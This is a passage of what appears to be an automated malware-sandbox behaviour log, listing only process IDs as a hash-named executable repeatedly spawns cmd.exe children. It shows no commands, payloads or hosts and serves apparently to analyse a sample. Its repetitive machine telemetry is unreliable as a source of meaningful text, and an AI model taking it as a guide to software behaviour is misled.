220 wrote to memory of 1628 220 cmd.exe 241 PID 1628 wrote to memory of 1728 1628 cmd.exe 242 PID 1628 wrote to memory of 1728 1628 cmd.exe 242 PID 1628 wrote to memory of 1728 1628 cmd.exe 242 PID 1628 wrote to memory of 1728 1628 cmd.exe 242 PID 220 wrote to memory of 112 220 cmd.exe 243 PID 220 wrote to memory of 112 220 cmd.exe 243 PID 220 wrote to memory of 112 220 cmd.exe 243 PID 220 wrote to memory of 112 220 cmd.exe 243 PID 1420 wrote to memory of 1952 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 244 PID 1420 wrote to memory of 1952 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 244 PID 1420 wrote to memory of 1952 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 244 PID 1420 wrote to memory of 1952 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 244 PID 1952 wrote to memory of 308 1952 cmd.exe 246 PID 1952 wrote to memory of 308 1952 cmd.exe 246 PID 1952 wrote to memory of 308 1952 cmd.exe 246 PID 1952 wrote to memory of 308 1952 cmd.exe 246 PID 1952 wrote to memory of 436 1952 cmd.exe 247 PID 1952 wrote to memory of 436 1952 cmd.exe 247 PID 1952 wrote to memory of 436 1952 cmd.exe 247 PID 1952 wrote to memory of 436 1952 cmd.exe 247 PID 1952 wrote to memory of 564 1952 cmd.exe 248 PID 1952 wrote to memory of 564 1952 cmd.exe 248 PID 1952 wrote to memory of 564 1952 cmd.exe 248 PID 1952 wrote to memory of 564 1952 cmd.exe 248 PID 564 wrote to memory of 1568 564 cmd.exe 249 PID 564 wrote to memory of 1568 564 cmd.exe 249 PID 564 wrote to memory of 1568 564 cmd.exe 249 PID 564 wrote to memory of 1568 564 cmd.exe 249 PID 1952 wrote to memory of 848 1952 cmd.exe 250 PID 1952 wrote to memory of 848 1952 cmd.exe 250 PID 1952 wrote to memory of 848 1952 cmd.exe 250 PID 1952 wrote to memory of 848 1952 cmd.exe 250 PID 1420 wrote to memory of 288 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 251 PID 1420 wrote to memory of 288 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 251 PID 1420 wrote to memory of 288 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 251 PID 1420 wrote to memory of 288 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 251 PID 288 wrote to memory of 1448 288 cmd.exe 253 PID 288 wrote to memory of 1448 288 cmd.exe 253 PID 288 wrote to memory of 1448 288 cmd.exe 253 PID 288 wrote to memory of 1448 288 cmd.exe 253 PID 288 wrote to memory of 1456 288 cmd.exe 254 PID 288 wrote to memory of 1456 288 cmd.exe 254 PID 288 wrote to memory of 1456 288 cmd.exe 254 PID 288 wrote to memory of 1456 288 cmd.exe 254 PID 288 wrote to memory of 1844 288 cmd.exe 255 PID 288 wrote to memory of 1844 288 cmd.exe 255 PID 288 wrote to memory of 1844 288 cmd.exe 255 PID 288 wrote to memory of 1844 288 cmd.exe 255 PID 1844 wrote to memory of 920 1844 cmd.exe 256 PID 1844 wrote to memory of 920 1844 cmd.exe 256 PID 1844 wrote to memory of 920 1844 cmd.exe 256 PID 1844 wrote to memory of 920 1844 cmd.exe 256 PID 288 wrote to memory of 1308 288 cmd.exe 257 PID 288 wrote to memory of 1308 288 cmd.exe 257 PID 288 wrote to memory of 1308 288 cmd.exe 257 PID 288 wrote to memory of 1308 288 cmd.exe 257 PID 1420 wrote to memory of 1492 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 258 PID 1420 wrote to memory of 1492 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 258 PID 1420 wrote to memory of 1492 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 258 PID 1420 wrote to memory of 1492 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 258 PID 1492 wrote to memory of 632 1492 cmd.exe 260 PID 1492 wrote to memory of 632 1492 cmd.exe 260 PID 1492 wrote to memory of 632 1492 cmd.exe 260 PID 1492 wrote to memory of 632 1492 cmd.exe 260 PID 1492 wrote to memory of 676 1492 cmd.exe 261 PID 1492 wrote to memory of 676 1492 cmd.exe 261 PID 1492 wrote to memory of 676 1492 cmd.exe 261 PID 1492 wrote to memory of 676 1492 cmd.exe 261 PID 1492 wrote to memory of 1348 1492 cmd.exe 262 PID 1492 wrote to memory of 1348 1492 cmd.exe 262 PID 1492 wrote to memory of 1348 1492 cmd.exe 262 PID 1492 wrote to memory of 1348 1492 cmd.exe 262 PID 1348 wrote to memory of 556 1348 cmd.exe 263 PID 1348 wrote to memory of 556 1348 cmd.exe 263 PID 1348 wrote to memory of 556 1348 cmd.exe 263 PID 1348 wrote to memory of 556 1348 cmd.exe 263 PID 1492 wrote to memory of 1252 1492 cmd.exe 264 PID 1492 wrote to memory of 1252 1492 cmd.exe 264 PID 1492 wrote to memory of 1252 1492 cmd.exe 264 PID 1492 wrote to memory of 1252 1492 cmd.exe 264 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 265 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 265 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 265 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 265 PID 1788 wrote to memory of 1116 1788 cmd.exe 267 PID 1788 wrote to memory of 1116 1788 cmd.exe 267 PID 1788 wrote to memory of 1116 1788 cmd.exe 267 PID 1788 wrote to memory of 1116 1788 cmd.exe 267 PID 1788 wrote to memory of 436 1788 cmd.exe 268 PID 1788 wrote to memory of 436 1788 cmd.exe 268 PID 1788 wrote to memory of 436 1788 cmd.exe 268 PID 1788 wrote to memory of 436 1788 cmd.exe 268 PID 1788 wrote to memory of 1992 1788 cmd.exe 269 PID 1788 wrote to memory of 1992 1788 cmd.exe 269 PID 1788 wrote to memory of 1992 1788 cmd.exe 269 PID 1788 wrote to memory of 1992 1788 cmd.exe 269 PID 1992 wrote to memory of 1568 1992 cmd.exe 270 PID 1992 wrote to memory of 1568 1992 cmd.exe 270 PID 1992 wrote to memory of 1568 1992 cmd.exe 270 PID 1992 wrote to memory of 1568 1992 cmd.exe 270 PID 1788 wrote to memory of 216 1788 cmd.exe 271 PID 1788 wrote to memory of 216 1788 cmd.exe 271 PID 1788 wrote to memory of 216 1788 cmd.exe 271 PID 1788 wrote to memory of 216 1788 cmd.exe 271 PID 1420 wrote to memory of 1876 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 272 PID 1420 wrote to memory of 1876 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 272 PID 1420 wrote to memory of 1876 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 272 PID 1420 wrote to memory of 1876 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 272 PID 1876 wrote to memory of 992 1876 cmd.exe 274 PID 1876 wrote to memory of 992 1876 cmd.exe 274 PID 1876 wrote to memory of 992 1876 cmd.exe 274 PID 1876 wrote to memory of 992 1876 cmd.exe 274 PID 1876 wrote to memory of 1672 1876 cmd.exe 275 PID 1876 wrote to memory of 1672 1876 cmd.exe 275 PID 1876 wrote to memory of 1672 1876 cmd.exe 275 PID 1876 wrote to memory of 1672 1876 cmd.exe 275 PID 1876 wrote to memory of 1456 1876 cmd.exe 276 PID 1876 wrote to memory of 1456 1876 cmd.exe 276 PID 1876 wrote to memory of 1456 1876 cmd.exe 276 PID 1876 wrote to memory of 1456 1876 cmd.exe 276 PID 1456 wrote to memory of 396 1456 cmd.exe 277 PID 1456 wrote to memory of 396 1456 cmd.exe 277 PID 1456 wrote to memory of 396 1456 cmd.exe 277 PID 1456 wrote to memory of 396 1456 cmd.exe 277 PID 1876 wrote to memory of 940 1876 cmd.exe 278 PID 1876 wrote to memory of 940 1876 cmd.exe 278 PID 1876 wrote to memory of 940 1876 cmd.exe 278 PID 1876 wrote to memory of 940 1876 cmd.exe 278 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 279 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 279 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 279 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 279 PID 1308 wrote to memory of 1576 1308 cmd.exe 281 PID 1308 wrote to memory of 1576 1308 cmd.exe 281 PID 1308 wrote to memory of 1576 1308 cmd.exe 281 PID 1308 wrote to memory of 1576 1308 cmd.exe 281 PID 1308 wrote to memory of 1900 1308 cmd.exe 282 PID 1308 wrote to memory of 1900 1308 cmd.exe 282 PID 1308 wrote to memory of 1900 1308 cmd.exe 282 PID 1308 wrote to memory of 1900 1308 cmd.exe 282 PID 1308 wrote to memory of 676 1308 cmd.exe 283 PID 1308 wrote to memory of 676 1308 cmd.exe 283 PID 1308 wrote to memory of 676 1308 cmd.exe 283 PID 1308 wrote to memory of 676 1308 cmd.exe 283 PID 676 wrote to memory of 1744 676 cmd.exe 284 PID 676 wrote to memory of 1744 676 cmd.exe 284 PID 676 wrote to memory of 1744 676 cmd.exe 284 PID 676 wrote to memory of 1744 676 cmd.exe 284 PID 1308 wrote to memory of 1728 1308 cmd.exe 285 PID 1308 wrote to memory of 1728 1308 cmd.exe 285 PID 1308 wrote to memory of 1728 1308 cmd.exe 285 PID 1308 wrote to memory of 1728 1308 cmd.exe 285 PID 1420 wrote to memory of 1392 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 286 PID 1420 wrote to memory of 1392 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 286 PID 1420 wrote to memory of 1392 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 286 PID 1420 wrote to memory of 1392 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 286 PID 1392 wrote to memory of 760 1392 cmd.exe 288 PID 1392 wrote to memory of 760 1392 cmd.exe 288 PID 1392 wrote to memory of 760 1392 cmd.exe 288 PID 1392 wrote to memory of 760 1392 cmd.exe 288 PID 1392 wrote to memory of 228 1392 cmd.exe 289 PID 1392 wrote to memory of 228 1392 cmd.exe 289 PID 1392 wrote to memory of 228 1392 cmd.exe 289 PID 1392 wrote to memory of 228 1392 cmd.exe 289 PID 1392 wrote to memory of 1268 1392 cmd.exe 290 PID 1392 wrote to memory of 1268 1392 cmd.exe 290 PID 1392 wrote to memory of 1268 1392 cmd.exe 290 PID 1392 wrote to memory of 1268 1392 cmd.exe 290 PID 1268 wrote to memory of 1300 1268 cmd.exe 291 PID 1268 wrote to memory of 1300 1268 cmd.exe 291 PID 1268 wrote to memory of 1300 1268 cmd.exe 291 PID 1268 wrote to memory of 1300 1268 cmd.exe 291 PID 1392 wrote to memory of 1568 1392 cmd.exe 292 PID 1392 wrote to memory of 1568 1392 cmd.exe 292 PID 1392 wrote to memory of 1568 1392 cmd.exe 292 PID 1392 wrote to memory of 1568 1392 cmd.exe 292 PID 1420 wrote to memory of 216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 293 PID 1420 wrote to memory of 216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 293 PID 1420 wrote to memory of 216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 293 PID 1420 wrote to memory of 216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 293 PID 216 wrote to memory of 876 216 cmd.exe 295 PID 216 wrote to memory of 876 216 cmd.exe 295 PID 216 wrote to memory of 876 216 cmd.exe 295 PID 216 wrote to memory of 876 216 cmd.exe 295 PID 216 wrote to memory of 1496 216 cmd.exe 296 PID 216 wrote to memory of 1496 216 cmd.exe 296 PID 216 wrote to memory of 1496 216 cmd.exe 296 PID 216 wrote to memory of 1496 216 cmd.exe 296 PID 216 wrote to memory of 1216 216 cmd.exe 297 PID 216 wrote to memory of 1216 216 cmd.exe 297 PID 216 wrote to memory of 1216 216 cmd.exe 297 PID 216 wrote to memory of 1216 216 cmd.exe 297 PID 1216 wrote to memory of 1236 1216 cmd.exe 298 PID 1216 wrote to memory of 1236 1216 cmd.exe 298 PID 1216 wrote to memory of 1236 1216 cmd.exe 298 PID 1216 wrote to memory of 1236 1216 cmd.exe 298 PID 216 wrote to memory of 396 216 cmd.exe 299 PID 216 wrote to memory of 396 216 cmd.exe 299 PID 216 wrote to memory of 396 216 cmd.exe 299 PID 216 wrote to memory of 396 216 cmd.exe 299 PID 1420 wrote to memory of 1912 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 300 PID 1420 wrote to memory of 1912 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 300 PID 1420 wrote to memory of 1912 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 300 PID 1420 wrote to memory of 1912 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 300 PID 1912 wrote to memory of 1916 1912 cmd.exe 302 PID 1912 wrote to memory of 1916 1912 cmd.exe 302 PID 1912 wrote to memory of 1916 1912 cmd.exe 302 PID 1912 wrote to memory of 1916 1912 cmd.exe 302 PID 1912 wrote to memory of 204 1912 cmd.exe 303 PID 1912 wrote to memory of 204 1912 cmd.exe 303 PID 1912 wrote to memory of 204 1912 cmd.exe 303 PID 1912 wrote to memory of 204 1912 cmd.exe 303 PID 1912 wrote to memory of 320 1912 cmd.exe 304 PID 1912 wrote to memory of 320 1912 cmd.exe 304 PID 1912 wrote to memory of 320 1912 cmd.exe 304 PID 1912 wrote to memory of 320 1912 cmd.exe 304 PID 320 wrote to memory of 2000 320 cmd.exe 305 PID 320 wrote to memory of 2000 320 cmd.exe 305 PID 320 wrote to memory of 2000 320 cmd.exe 305 PID 320 wrote to memory of 2000 320 cmd.exe 305 PID 1912 wrote to memory of 1744 1912 cmd.exe 306 PID 1912 wrote to memory of 1744 1912 cmd.exe 306 PID 1912 wrote to memory of 1744 1912 cmd.exe 306 PID 1912 wrote to memory of 1744 1912 cmd.exe 306 PID 1420 wrote to memory of 1892 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 307 PID 1420 wrote to memory of 1892 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 307 PID 1420 wrote to memory of 1892 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 307 PID 1420 wrote to memory of 1892 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 307 PID 1892 wrote to memory of 112 1892 cmd.exe 309 PID 1892 wrote to memory of 112 1892 cmd.exe 309 PID 1892 wrote to memory of 112 1892 cmd.exe 309 PID 1892 wrote to memory of 112 1892 cmd.exe 309 PID 1892 wrote to memory of 308 1892 cmd.exe 310 PID 1892 wrote to memory of 308 1892 cmd.exe 310 PID 1892 wrote to memory of 308 1892 cmd.exe 310 PID 1892 wrote to memory of 308 1892 cmd.exe 310 PID 1892 wrote to memory of 1116 1892 cmd.exe 311 PID 1892 wrote to memory of 1116 1892 cmd.exe 311 PID 1892 wrote to memory of 1116 1892 cmd.exe 311 PID 1892 wrote to memory of 1116 1892 cmd.exe 311 PID 1116 wrote to memory of 436 1116 cmd.exe 312 PID 1116 wrote to memory of 436 1116 cmd.exe 312 PID 1116 wrote to memory of 436 1116 cmd.exe 312 PID 1116 wrote to memory of 436 1116 cmd.exe 312 PID 1892 wrote to memory of 1300 1892 cmd.exe 313 PID 1892 wrote to memory of 1300 1892 cmd.exe 313 PID 1892 wrote to memory of 1300 1892 cmd.exe 313 PID 1892 wrote to memory of 1300 1892 cmd.exe 313 PID 1420 wrote to memory of 656 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 314 PID 1420 wrote to memory of 656 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 314 PID 1420 wrote to memory of 656 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 314 PID 1420 wrote to memory of 656 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 314 PID 656 wrote to memory of 1224 656 cmd.exe 316 PID 656 wrote to memory of 1224 656 cmd.exe 316 PID 656 wrote to memory of 1224 656 cmd.exe 316 PID 656 wrote to memory of 1224 656 cmd.exe 316 PID 656 wrote to memory of 1448 656 cmd.exe 317 PID 656 wrote to memory of 1448 656 cmd.exe 317 PID 656 wrote to memory of 1448 656 cmd.exe 317 PID 656 wrote to memory of 1448 656 cmd.exe 317 PID 656 wrote to memory of 992 656 cmd.exe 318 PID 656 wrote to memory of 992 656 cmd.exe 318 PID 656 wrote to memory of 992 656 cmd.exe 318 PID 656 wrote to memory of 992 656 cmd.exe 318 PID 992 wrote to memory of 1672 992 cmd.exe 319 PID 992 wrote to memory of 1672 992 cmd.exe 319 PID 992 wrote to memory of 1672 992 cmd.exe 319 PID 992 wrote to memory of 1672 992 cmd.exe 319 PID 656 wrote to memory of 1236 656 cmd.exe 320 PID 656 wrote to memory of 1236 656 cmd.exe 320 PID 656 wrote to memory of 1236 656 cmd.exe 320 PID 656 wrote to memory of 1236 656 cmd.exe 320 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 321 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 321 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 321 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 321 PID 668 wrote to memory of 1968 668 cmd.exe 323 PID 668 wrote to memory of 1968 668 cmd.exe 323 PID 668 wrote to memory of 1968 668 cmd.exe 323 PID 668 wrote to memory of 1968 668 cmd.exe 323 PID 668 wrote to memory of 2004 668 cmd.exe 324 PID 668 wrote to memory of 2004 668 cmd.exe 324 PID 668 wrote to memory of 2004 668 cmd.exe 324 PID 668 wrote to memory of 2004 668 cmd.exe 324 PID 668 wrote to memory of 1576 668 cmd.exe 325 PID 668 wrote to memory of 1576 668 cmd.exe 325 PID 668 wrote to memory of 1576 668 cmd.exe 325 PID 668 wrote to memory of 1576 668 cmd.exe 325 PID 1576 wrote to memory of 1900 1576 cmd.exe 326 PID 1576 wrote to memory of 1900 1576 cmd.exe 326 PID 1576 wrote to memory of 1900 1576 cmd.exe 326 PID 1576 wrote to memory of 1900 1576 cmd.exe 326 PID 668 wrote to memory of 2000 668 cmd.exe 327 PID 668 wrote to memory of 2000 668 cmd.exe 327 PID 668 wrote to memory of 2000 668 cmd.exe 327 PID 668 wrote to memory of 2000 668 cmd.exe 327 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 328 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 328 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 328 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 328 PID 608 wrote to memory of 1344 608 cmd.exe 330 PID 608 wrote to memory of 1344 608 cmd.exe 330 PID 608 wrote to memory of 1344 608 cmd.exe 330 PID 608 wrote to memory of 1344 608 cmd.exe 330 PID 608 wrote to memory of 1252 608 cmd.exe 331 PID 608 wrote to memory of 1252 608 cmd.exe 331 PID 608 wrote to memory of 1252 608 cmd.exe 331 PID 608 wrote to memory of 1252 608 cmd.exe 331 PID 608 wrote to memory of 760 608 cmd.exe 332 PID 608 wrote to memory of 760 608 cmd.exe 332 PID 608 wrote to memory of 760 608 cmd.exe 332 PID 608 wrote to memory of 760 608 cmd.exe 332 PID 760 wrote to memory of 228 760 cmd.exe 333 PID 760 wrote to memory of 228 760 cmd.exe 333 PID 760 wrote to memory of 228 760 cmd.exe 333 PID 760 wrote to memory of 228 760 cmd.exe 333 PID 608 wrote to memory of 436 608 cmd.exe 334 PID 608 wrote to memory of 436 608 cmd.exe 334 PID 608 wrote to memory of 436 608 cmd.exe 334 PID 608 wrote to memory of 436 608 cmd.exe 334 PID 1420 wrote to memory of 616 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 335 PID 1420 wrote to memory of 616 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 335 PID 1420 wrote to memory of 616 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 335 PID 1420 wrote to memory of 616 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 335 PID 616 wrote to memory of 1340 616 cmd.exe 337 PID 616 wrote to memory of 1340 616 cmd.exe 337 PID 616 wrote to memory of 1340 616 cmd.exe 337 PID 616 wrote to memory of 1340 616 cmd.exe 337 PID 616 wrote to memory of 1364 616 cmd.exe 338 PID 616 wrote to memory of 1364 616 cmd.exe 338 PID 616 wrote to memory of 1364 616 cmd.exe 338 PID 616 wrote to memory of 1364 616 cmd.exe 338 PID 616 wrote to memory of 876 616 cmd.exe 339 PID 616 wrote to memory of 876 616 cmd.exe 339 PID 616 wrote to memory of 876 616 cmd.exe 339 PID 616 wrote to memory of 876 616 cmd.exe 339 PID 876 wrote to memory of 1496 876 cmd.exe 340 PID 876 wrote to memory of 1496 876 cmd.exe 340 PID 876 wrote to memory of 1496 876 cmd.exe 340 PID 876 wrote to memory of 1496 876 cmd.exe 340 PID 616 wrote to memory of 1672 616 cmd.exe 341 PID 616 wrote to memory of 1672 616 cmd.exe 341 PID 616 wrote to memory of 1672 616 cmd.exe 341 PID 616 wrote to memory of 1672 616 cmd.exe 341 PID 1420 wrote to memory of 1536 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 342 PID 1420 wrote to memory of 1536 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 342 PID 1420 wrote to memory of 1536 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 342 PID 1420 wrote to memory of 1536 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 342 PID 1536 wrote to memory of 536 1536 cmd.exe 344 PID 1536 wrote to memory of 536 1536 cmd.exe 344 PID 1536 wrote to memory of 536 1536 cmd.exe 344 PID 1536 wrote to memory of 536 1536 cmd.exe 344 PID 1536 wrote to memory of 288 1536 cmd.exe 345 PID 1536 wrote to memory of 288 1536 cmd.exe 345 PID 1536 wrote to memory of 288 1536 cmd.exe 345 PID 1536 wrote to memory of 288 1536 cmd.exe 345 PID 1536 wrote to memory of 1916 1536 cmd.exe 346 PID 1536 wrote to memory of 1916 1536 cmd.exe 346 PID 1536 wrote to memory of 1916 1536 cmd.exe 346 PID 1536 wrote to memory of 1916 1536 cmd.exe 346 PID 1916 wrote to memory of 204 1916 cmd.exe 347 PID 1916 wrote to memory of 204 1916 cmd.exe 347 PID 1916 wrote to memory of 204 1916 cmd.exe 347 PID 1916 wrote to memory of 204 1916 cmd.exe 347 PID 1536 wrote to memory of 1900 1536 cmd.exe 348 PID 1536 wrote to memory of 1900 1536 cmd.exe 348 PID 1536 wrote to memory of 1900 1536 cmd.exe 348 PID 1536 wrote to memory of 1900 1536 cmd.exe 348 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 349 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 349 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 349 PID 1420 wrote to memory of 1788 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 349 PID 1788 wrote to memory of 1844 1788 cmd.exe 351 PID 1788 wrote to memory of 1844 1788 cmd.exe 351 PID 1788 wrote to memory of 1844 1788 cmd.exe 351 PID 1788 wrote to memory of 1844 1788 cmd.exe 351 PID 1788 wrote to memory of 576 1788 cmd.exe 352 PID 1788 wrote to memory of 576 1788 cmd.exe 352 PID 1788 wrote to memory of 576 1788 cmd.exe 352 PID 1788 wrote to memory of 576 1788 cmd.exe 352 PID 1788 wrote to memory of 1068 1788 cmd.exe 353 PID 1788 wrote to memory of 1068 1788 cmd.exe 353 PID 1788 wrote to memory of 1068 1788 cmd.exe 353 PID 1788 wrote to memory of 1068 1788 cmd.exe 353 PID 1068 wrote to memory of 1764 1068 cmd.exe 354 PID 1068 wrote to memory of 1764 1068 cmd.exe 354 PID 1068 wrote to memory of 1764 1068 cmd.exe 354 PID 1068 wrote to memory of 1764 1068 cmd.exe 354 PID 1788 wrote to memory of 832 1788 cmd.exe 355 PID 1788 wrote to memory of 832 1788 cmd.exe 355 PID 1788 wrote to memory of 832 1788 cmd.exe 355 PID 1788 wrote to memory of 832 1788 cmd.exe 355 PID 1420 wrote to memory of 2028 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 356 PID 1420 wrote to memory of 2028 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 356 PID 1420 wrote to memory of 2028 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 356 PID 1420 wrote to memory of 2028 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 356 PID 2028 wrote to memory of 1300 2028 cmd.exe 358 PID 2028 wrote to memory of 1300 2028 cmd.exe 358 PID 2028 wrote to memory of 1300 2028 cmd.exe 358 PID 2028 wrote to memory of 1300 2028 cmd.exe 358 PID 2028 wrote to memory of 1428 2028 cmd.exe 359 PID 2028 wrote to memory of 1428 2028 cmd.exe 359 PID 2028 wrote to memory of 1428 2028 cmd.exe 359 PID 2028 wrote to memory of 1428 2028 cmd.exe 359 PID 2028 wrote to memory of 1192 2028 cmd.exe 360 PID 2028 wrote to memory of 1192 2028 cmd.exe 360 PID 2028 wrote to memory of 1192 2028 cmd.exe 360 PID 2028 wrote to memory of 1192 2028 cmd.exe 360 PID 1192 wrote to memory of 936 1192 cmd.exe 361 PID 1192 wrote to memory of 936 1192 cmd.exe 361 PID 1192 wrote to memory of 936 1192 cmd.exe 361 PID 1192 wrote to memory of 936 1192 cmd.exe 361 PID 2028 wrote to memory of 848 2028 cmd.exe 362 PID 2028 wrote to memory of 848 2028 cmd.exe 362 PID 2028 wrote to memory of 848 2028 cmd.exe 362 PID 2028 wrote to memory of 848 2028 cmd.exe 362 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 363 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 363 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 363 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 363 PID 1672 wrote to memory of 1236 1672 cmd.exe 365 PID 1672 wrote to memory of 1236 1672 cmd.exe 365 PID 1672 wrote to memory of 1236 1672 cmd.exe 365 PID 1672 wrote to memory of 1236 1672 cmd.exe 365 PID 1672 wrote to memory of 1952 1672 cmd.exe 366 PID 1672 wrote to memory of 1952 1672 cmd.exe 366 PID 1672 wrote to memory of 1952 1672 cmd.exe 366 PID 1672 wrote to memory of 1952 1672 cmd.exe 366 PID 1672 wrote to memory of 940 1672 cmd.exe 367 